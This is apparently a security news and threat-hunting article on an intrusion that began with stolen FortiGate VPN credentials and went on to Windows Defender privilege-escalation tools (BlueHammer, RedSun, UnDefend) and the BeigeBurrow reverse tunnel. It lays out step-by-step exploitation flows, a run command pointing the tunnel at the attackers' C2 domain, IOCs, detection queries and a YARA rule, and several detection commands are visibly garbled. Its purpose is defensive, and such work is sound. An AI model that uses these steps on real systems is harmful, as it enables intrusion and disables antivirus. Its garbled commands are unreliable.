Nightmare-Eclipse Unleashed: First In-The-Wild Windows Defender Zero-Day Chain Exploited via Hacked FortiGate VPN + Video

Listen to this Post

🐢▶️ Listen🚀

Introduction

In a watershed moment for enterprise security, threat actors have deployed the newly disclosed “Nightmare-Eclipse” toolkit—comprising BlueHammer, RedSun, and UnDefend—against a live victim after gaining initial access through a compromised FortiGate SSL VPN. This marks the first confirmed in-the-wild use of these local privilege escalation (LPE) exploits, which weaponize logic flaws in Windows Defender’s own operations to achieve SYSTEM-level access or cripple antivirus defenses entirely.

Learning Objectives

• Understand how Nightmare-Eclipse tools exploit TOCTOU race conditions and cloud file callbacks in Windows Defender to read the SAM database and overwrite system files.
• Learn to detect FortiGate SSL VPN credential abuse by analyzing multi-geography authentication patterns and anomalous tunneling traffic.
• Master hands-on hunting and mitigation strategies, including YARA rules, log analysis, and emergency response playbooks.

You Should Know

1. Dissecting BlueHammer: Stealing the SAM Database by Freezing Defender

The BlueHammer exploit (CVE-2026-33825) demonstrates a sophisticated Time-of-Check Time-of-Use (TOCTOU) race condition that leverages Windows Defender’s own remediation workflow to read the Security Account Manager (SAM) hive. Attackers start by polling the Windows Update API for a pending update and copying its files locally. They then write the standard EICAR test string to disk, forcing Defender to create a frozen Volume Shadow Copy (VSS) as part of its quarantine process.

By placing an opportunistic lock (oplock) on a system file that Defender accesses during scans, the exploit can precisely time when Defender is suspended. It then registers a fake cloud sync provider—structurally identical to OneDrive—and places a file inside its directory. When Defender enumerates that directory, the callback fires, and BlueHammer confirms Defender’s identity before holding a lock on the file, causing Defender’s scan thread to wait indefinitely.

With a frozen VSS containing an unlocked copy of the SAM database and a suspended Defender process, BlueHammer instructs Defender to import a signature update from a staged location. During the file-open operation, the exploit swaps the path to point directly at the SAM database within the frozen VSS. Defender, believing it is reading a definition file, writes the SAM contents to its output directory, where BlueHammer retrieves a handle to the credential hive.

Step‑by‑step exploitation flow:

1. Reconnaissance – Poll Windows Update API for pending updates.
2. Trigger VSS freeze – Write EICAR test string to disk; Defender creates a frozen volume snapshot.
3. Synchronization – Place an oplock on a system file Defender accesses mid‑scan; when lock breaks, scan is confirmed in progress.
4. Register fake cloud provider – Create a directory with a callback that identifies Defender.
5. Suspend Defender – Place a lock on a file Defender tries to open; scan thread waits indefinitely.
6. Redirect read – Instruct Defender to import a signature update from a staged location; swap the path to point to the SAM database inside the frozen VSS.
7. Extract credentials – Defender writes SAM to its output directory; BlueHammer parses the hive and decrypts NT hashes.
8. Password change & token theft – Change each user’s password to $PWNed666!!!WDFAIL, generate admin sessions, copy the SYSTEM token, and spawn a SYSTEM shell.

Detection commands (Windows):

 Hunt for BlueHammer staging artifacts
Get-ChildItem -Path C:\Users\Pictures\ -Include FunnyApp.exe -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\Downloads\ -Include RedSun.exe, undef.exe, z.exe -Recurse -ErrorAction SilentlyContinue

Check for EICAR test string writes
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; ID=1116} | Where-Object {$_.Message -like 'EICAR'}

Look for Defender detection of BlueHammer
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; ID=1116} | Where-Object {$_.Message -like 'Exploit:Win32/DfndrPEBluHmr.BZ'}

1. RedSun: Overwriting System32 Binaries via Cloud File Trickery

RedSun achieves SYSTEM-level access by overwriting `TieringEngineService.exe` in `C:\Windows\System32` using a race condition in Defender’s Cloud File detection and remediation handling. The exploit creates a staging directory in %TEMP%, writes the EICAR test string as TieringEngineService.exe, and opens the file with `FILE_EXECUTE` access to trigger a Defender scan.

Using an oplock on the VSS version of the file, RedSun waits for Defender to begin scanning. Once scanning starts, the original file is deleted, and the directory is registered as a Cloud Files sync root with a placeholder at TieringEngineService.exe. The working directory is renamed, the original path re-created as empty, and the placeholder file reopened—acquiring another oplock. In the TOCTOU window, the empty directory is converted to a mount point pointing to C:\Windows\System32. When Defender attempts to restore the “malicious file,” it writes `RedSun.exe` directly into C:\Windows\System32\TieringEngineService.exe—a location unprivileged users normally cannot write to. RedSun then calls the Storage Tiers Management COM object (running as SYSTEM), which executes the dropped binary and spawns a SYSTEM shell.

Step‑by‑step exploitation:

1. Stage payload – Create `%TEMP%\RS-{GUID}\TieringEngineService.exe` (EICAR string).

1. Trigger scan – Open file with FILE_EXECUTE; Defender scans it.
2. Oplock sync – Acquire oplock on VSS version; when scanning starts, delete original file.
3. Register cloud root – Mark directory as a Cloud Files sync root with a placeholder.
4. TOCTOU swap – Rename directory to .TMP, re‑create empty original path, reopen placeholder, acquire oplock, then rename placeholder to `.TEMP2` and mark for deletion.
5. Mount point redirect – Convert empty directory to a mount point targeting C:\Windows\System32.
6. Write to System32 – Defender restores the file to `C:\Windows\System32\TieringEngineService.exe` (RedSun copy).
7. Elevate – Call Storage Tiers Management COM object (SYSTEM), which executes the dropped binary and spawns a SYSTEM shell.

Detection commands:

 Hunt for RedSun staging artifacts
Get-ChildItem -Path C:\Users\Downloads\ -Include RedSun.exe -Recurse -ErrorAction SilentlyContinue

Check for EICAR alerts tied to TieringEngineService.exe
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Windows Defender/Operational'; ID=1116} | Where-Object {$_.Message -like 'TieringEngineService.exe'}

Monitor for unexpected TieringEngineService.exe executions
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {$_.Properties[bash].Value -like 'TieringEngineService.exe'}

1. UnDefend: Disabling Defender Signature Updates Without Admin Rights

UnDefend is a Windows Defender “killer” that, unlike traditional LPEs, operates as a denial-of-service (DoS) tool preventing Defender from receiving definition updates. It runs entirely with standard user privileges and watches Defender’s Definition Updates directory and the Malicious Software Removal Tool directory using directory change notifications. When a new or modified definition file appears, UnDefend races to open and lock the file before Defender can use it. Backup definition files (mpavbase.lkg and mpavbase.vdm) are locked immediately at startup.

More critically, UnDefend registers a service status notification for `WinDefend` and waits for the service to stop. When that occurs—during any service stop event, not just major updates—it immediately locks `mpavbase.vdm` at the active signature location, preventing Defender from reloading its signature base upon restart. These locks are held in memory as open handles; when UnDefend’s process exits, the OS releases all handles and Defender recovers. This provides disruption only while the tool is running, but that window is sufficient for an attacker to execute further payloads without detection.

Step‑by‑step disruption:

1. Start monitoring – Launch `undef.exe` (or z.exe) from a user‑writable directory.
2. Lock definition files – Immediately lock `mpavbase.lkg` and mpavbase.vdm.
3. Watch for updates – Monitor Definition Updates and MRT directories for file changes.
4. Race to lock – When a new definition file appears, open and lock it before Defender.
5. Service stop detection – Register for `WinDefend` service stop notifications.
6. Prevent reload – Upon service stop, lock the active signature location, blocking Defender from reloading signatures on restart.

Detection commands:

 Hunt for UnDefend binaries
Get-ChildItem -Path C:\Users\Downloads\undef.exe -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\Downloads\z.exe -Recurse -ErrorAction SilentlyContinue

Look for anomalous file locks on Defender definition files (requires Sysinternals Handle)
handle.exe -a mpavbase.vdm

Check for WinDefend service stop events
Get-WinEvent -FilterHashtable @{LogName='System'; ID=7036} | Where-Object {$_.Message -like 'Windows Defender Antivirus Servicestopped'}

4. BeigeBurrow: The Covert Yamux Tunnel That Succeeded

Unlike the failed privilege escalation attempts, the Go‑compiled binary `agent.exe` (dubbed BeigeBurrow) successfully established a persistent, multiplexed reverse tunnel to attacker‑controlled infrastructure. It uses HashiCorp’s Yamux library to create a single outbound TCP connection over port 443—a port rarely blocked by enterprise firewalls—and then multiplexes multiple streams over that single connection.

BeigeBurrow accepts three command‑line flags: `-server` (C2 address), `-hide` (hide console window), and `-chain` (daisy‑chaining, non‑functional in this build). Once running, it enters an infinite loop calling runAgent(). If the connection fails, it sleeps for 5 minutes and retries indefinitely. When connected, it creates a Yamux session with default configuration and waits for the operator to open new streams. For each stream, the agent reads a newline‑terminated target address (e.g., 10.0.0.5:445\n), strips the newline, dials the specified host:port over TCP, and relays traffic bidirectionally between the C2 stream and the target. This gives the operator full internal network access from the compromised host.

Step‑by‑step tunneling:

1. Execute agent – Run agent.exe -server staybud.dpdns[.]org:443 -hide.
2. Hide console – Console window is hidden for stealth.
3. Connect to C2 – Establish TCP connection to C2 on port 443.
4. Yamux session – Create multiplexed session using default configuration.
5. Stream handling – For each new stream, read target address (e.g., 192.168.1.100:3389), dial TCP, and relay traffic.
6. Persist – If connection drops, retry every 5 minutes indefinitely.

Detection commands:

 Hunt for agent.exe executions
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {$_.Properties[bash].Value -like 'agent.exe'} | Format-List

Check for outbound connections to suspicious domains
netstat -ano | findstr "staybud.dpdns.org"

Monitor for processes with hidden windows (using PowerShell)
Get-Process | Where-Object {$<em>.MainWindowTitle -eq '' -and $</em>.ProcessName -eq 'agent'} | Format-List

Search for BeigeBurrow SHA-256 hash (known sample)
Get-ChildItem -Path C:\ -Include .exe -Recurse -ErrorAction SilentlyContinue | Get-FileHash -Algorithm SHA256 | Where-Object {$_.Hash -eq 'a2b6c7a9c4490df70de3cdbfa5fc801a3e1cf6a872749259487e354de2876b7c'}

5. FortiGate SSL VPN: The Initial Access Vector

Customer‑provided VPN logs revealed the entry point: on April 15, 2026 at 13:44 UTC, an attacker initiated an SSL VPN connection to a FortiGate firewall using valid user credentials from IP `78.29.48[.]29` (Russia). Subsequent unauthorized sessions from the same account were observed from `212.232.23[.]69` (Singapore) and `179.43.140[.]214` (Switzerland)—a multi‑geography access pattern consistent with credential abuse and potential credential resale.

FortiGate log analysis commands:

 SSH into FortiGate and check SSL VPN logs
diagnose vpn ssl list
get log memory | grep -i "ssl vpn"
execute log display | grep -E "78.29.48.29|212.232.23.69|179.43.140.214"

Check for multiple geographies from same user in short timeframe (requires log aggregation)
zgrep "ssl.user=username" /var/log/fortigate/.log | awk '{print $1, $2, $NF}' | sort | uniq -c

Enable detailed SSL VPN logging (if not already)
config log setting
set vpn enable
end

Detection rules for SIEM:

-- Splunk query: same user authenticating from >2 distinct countries within 1 hour
index=fortigate sourcetype=vpn_log 
| stats values(geoip.country_name) as countries, earliest(_time) as first, latest(_time) as last by user
| where mvcount(countries) > 2 AND (last - first) < 3600

1. Hands‑on‑Keyboard Enumeration: What the Attacker Did After Access

The threat actor performed active reconnaissance using standard Windows commands. Huntress documented the following enumeration sequence, indicating a live operator rather than an automated script:

– `whoami /priv` – Check current user’s privileges.
– `cmdkey /list` – List stored credentials in Windows Credential Manager.
– `net group` – Enumerate domain groups and members.

Notably, `whoami /priv` was spawned directly from an `M365Copilot.exe` process—an anomaly investigators could not fully explain but noted occurred after initial compromise and after BlueHammer’s first execution attempt.

Detection commands:

 Hunt for enumeration commands from unusual parent processes
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {
$<em>.Properties[bash].Value -match 'whoami|cmdkey|net' -and 
$</em>.Properties[bash].Value -notmatch 'cmd.exe|powershell.exe'
} | Format-List

Monitor for M365Copilot.exe spawning unusual children
Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4688} | Where-Object {
$_.Properties[bash].Value -eq 'M365Copilot.exe'
} | Format-List

7. YARA Rule for BeigeBurrow Detection

Huntress has published a YARA rule to detect BeigeBurrow across enterprise environments. The rule targets the Go‑compiled binary’s unique strings and Yamux library usage.

rule BeigeBurrow_Agent {
meta:
description = "Detects BeigeBurrow tunneling agent"
author = "Huntress"
date = "2026-04-20"
strings:
$s1 = "yamux" wide ascii
$s2 = "staybud.dpdns.org" wide ascii
$s3 = "-server" wide ascii
$s4 = "runAgent" wide ascii
$s5 = "HashiCorp" wide ascii
condition:
(uint16(0) == 0x5A4D) and (any of ($s))
}

What Undercode Say

• Trust no layer: The Nightmare-Eclipse campaign proves that even first‑party security software like Windows Defender can become the attack vector when logic flaws are weaponized. Organizations must adopt defense‑in‑depth and never rely on a single security control.
• Credential abuse remains the silent killer: The FortiGate VPN compromise highlights that multi‑factor authentication (MFA) is no longer optional. Attackers are buying and reselling stolen credentials, and a single compromised account with VPN access can lead to full domain takeover.
• Tool familiarity matters: The attacker’s misspelled `-agressive` flag and use of a non‑functional `-h` help flag demonstrate that even threat actors are fallible. This creates detection opportunities: anomalous command lines, repeated tool failures, and unusual parent‑child process relationships are all high‑fidelity indicators.
• BeigeBurrow is a blueprint for modern C2: Using port 443 and Yamux multiplexing, this agent achieves persistence, stealth, and full network pivoting with minimal noise. Defenders must monitor for outbound connections to suspicious domains, hidden console windows, and processes that never exit.

Prediction

The public release of BlueHammer, RedSun, and UnDefend by Chaotic Eclipse will trigger a wave of copycat intrusions over the next 3–6 months, as low‑skill actors incorporate these tools into ransomware and initial access broker campaigns. Microsoft’s patch for BlueHammer (CVE-2026-33825) will reduce but not eliminate risk, as RedSun and UnDefend remain unpatched zero‑days. Expect to see these tools bundled into automated exploit frameworks and offered as a service on underground forums. Organizations that fail to implement robust VPN MFA, endpoint detection and response (EDR) with behavioral rules, and proactive log hunting will be at critical risk. The long‑term fallout may force Microsoft to redesign Defender’s privileged operations and access controls, potentially breaking backwards compatibility—a costly but necessary evolution.

▶️ Related Video (82% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Gurubaran Cybersecuritynews – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky